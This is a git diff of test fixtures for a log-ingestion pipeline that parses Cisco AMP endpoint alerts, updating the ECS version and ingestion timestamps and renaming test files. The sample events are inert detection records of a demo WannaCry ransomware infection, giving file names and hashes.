"kind": "alert", "action": "Threat Detected", @@ -4594,7 +4594,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4624,7 +4624,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500242912Z", + "ingested": "2021-09-13T18:07:28.111250102Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4679,7 +4679,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4709,7 +4709,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500244968Z", + "ingested": "2021-09-13T18:07:28.111252179Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4764,7 +4764,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4794,7 +4794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500247029Z", + "ingested": "2021-09-13T18:07:28.111254243Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4849,7 +4849,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4879,7 +4879,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500249078Z", + "ingested": "2021-09-13T18:07:28.111256297Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -4934,7 +4934,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -4964,7 +4964,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500251139Z", + "ingested": "2021-09-13T18:07:28.111258359Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -5017,7 +5017,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -5037,7 +5037,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500253189Z", + "ingested": "2021-09-13T18:07:28.111260412Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "kind": "alert", "action": "Threat Quarantined", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json index c2aa4b46070..d7f77b936f5 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094001496Z", + "ingested": "2021-09-13T18:07:42.929459130Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -83,7 +83,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -103,7 +103,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094015339Z", + "ingested": "2021-09-13T18:07:42.929464236Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -158,7 +158,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -178,7 +178,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094017473Z", + "ingested": "2021-09-13T18:07:42.929466403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -233,7 +233,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -253,7 +253,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094019533Z", + "ingested": "2021-09-13T18:07:42.929468348Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -308,7 +308,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -328,7 +328,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094021497Z", + "ingested": "2021-09-13T18:07:42.929470269Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -383,7 +383,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -403,7 +403,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094023420Z", + "ingested": "2021-09-13T18:07:42.929472180Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -460,7 +460,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -490,7 +490,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094025345Z", + "ingested": "2021-09-13T18:07:42.929474079Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -554,7 +554,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -586,7 +586,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094027258Z", + "ingested": "2021-09-13T18:07:42.929476066Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -645,7 +645,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -675,7 +675,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094029167Z", + "ingested": "2021-09-13T18:07:42.929477971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -730,7 +730,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
